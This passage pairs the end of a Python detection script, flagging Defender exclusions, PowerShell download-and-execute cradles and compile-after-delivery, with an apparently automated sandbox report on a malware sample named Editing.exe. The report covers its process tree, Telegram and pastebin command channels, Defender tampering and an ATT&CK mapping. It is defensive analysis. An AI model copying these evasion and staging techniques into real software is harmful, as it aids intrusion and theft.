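    m = MP_EXCL_RE.search(ev.command_line)
    if not m:
        return None
    value = m.group("sq") or m.group("dq") or m.group("bare") or ""
    if m.group("kind").lower() == "path" and DRIVE_ROOT_RE.match(value):
        return Finding("defender_exclusion_added", "critical",
                       f"exclusion covers the whole {value[:2]} volume")
    return Finding("defender_exclusion_added", "medium",
                   f"Exclusion{m.group('kind')} = {value}")


def detect_download_cradle(ev: ProcEvent) -> Optional[Finding]:
    """PowerShell fetching a URL and handing it straight to Invoke-Expression."""
    if not PS_RE.search(ev.image):
        return None
    cl = ev.command_line
    if not (IEX_RE.search(cl) and FETCH_RE.search(cl)):
        return None
    hosts = sorted({urlparse(u).hostname or "" for u in URL_RE.findall(cl)})
    paste = [h for h in hosts if h in PASTE_HOSTS]
    detail = f"remote script executed in memory from {hosts}"
    if re.search(r"-ExecutionPolicy\s+Bypass", cl, re.I):
        detail += "; execution policy bypassed"
    if paste:
        detail += "; paste service used as stager"
    return Finding("powershell_download_cradle", "critical" if paste else "high", detail)


def detect_compile_after_delivery(ev: ProcEvent) -> Optional[Finding]:
    """csc.exe launched by PowerShell with a response file in %TEMP%."""
    if not (CSC_RE.search(ev.image) and PS_RE.search(ev.parent_image)):
        return None
    m = TEMP_CMDLINE_RE.search(ev.command_line)
    if not m:
        return None
    return Finding("compile_after_delivery", "high",
                   f"csc.exe spawned by PowerShell with response file {m.group('rsp')}")


RULES = (detect_defender_exclusion, detect_download_cradle, detect_compile_after_delivery)


def run_rules(events: List[ProcEvent]) -> List[Finding]:
    """Apply every rule to every event, preserving event order."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.rule}: {f.detail}")
```

The first rule ranks a drive-root ExclusionPath as critical because it takes every file on the volume out of Defender scanning; on a live host confirm with Get-MpPreference | Select-Object -ExpandProperty ExclusionPath and look for the matching Windows Defender Operational event 5007 (configuration changed), which records the new Exclusions\Paths registry value. The third rule fires on the same pattern that legitimate Add-Type calls in administration scripts produce, so correlate the PowerShell parent's own ancestry (here a freshly downloaded Desktop executable) before escalating.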
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (x3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (x3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\ Editing.exe Code function: 0_2_00007FF646DF03BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF646DF03BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Editing.exe, 00000000.00000002.3213355561.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2460451409.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2461347543.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2554825670.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728413319.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2727732700.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2555244035.00000284CDB40000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.3198778516.00000284CDB57000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000003.2728554662.00000284CDB57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ Editing.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK Matrix

Techniques are grouped by tactic column. The number in parentheses is the numeral the report attaches to that technique (its signature-hit marker), reproduced verbatim; techniques without a number are matrix cells with no matching signature in this report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (111); Obfuscated Files or Information (1); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (121); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service (2); Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph

Behavior Graph ID: 1617330; Sample: Editing.exe; Start date: 17/02/2025; Architecture: WINDOWS; Score: 100. The graph image is not reproduced here; the following is recovered from its extracted text, with the graph's own node numbers kept for reference. The graph legend labels the small counters shown next to a process node as numbers of created registry values and created files.

Process tree:
  Editing.exe (node 9, started; counter 11)
    powershell.exe (node 13; counters 14, 24)
      csc.exe (node 22; counter 3)
        cvtres.exe (node 31; counter 1)
      conhost.exe (node 25)
    powershell.exe (node 18; counter 23)
      conhost.exe (node 27)
    powershell.exe (node 20)
      conhost.exe (node 29)

Network contacts:
  Editing.exe (node 9): ip-api.com 208.95.112.1 port 80 (client port 51663; TUT-ASUS, United States); api.telegram.org 149.154.167.220 port 443 (client ports 51668, 51881; TELEGRAMRU, United Kingdom); 2 other IPs or domains
  powershell.exe (node 13): pastebin.com 104.20.3.235 port 443 (client port 49706; CLOUDFLARENETUS, United States)

Dropped files:
  C:\Users\user\AppData\...\fri53hgi.cmdline (Unicode), written by powershell.exe (node 13)
  C:\Users\user\AppData\Local\...\fri53hgi.dll (PE32), written by csc.exe (node 22)

Signatures attached to graph nodes:
  Top level: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 7 other signatures
  pastebin.com: Connects to a pastebin service (likely for C&C)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Editing.exe (node 9): Adds a directory exclusion to Windows Defender
  powershell.exe (node 13): Writes to foreign memory regions
  powershell.exe (node 18): Loading BitLocker PowerShell Module
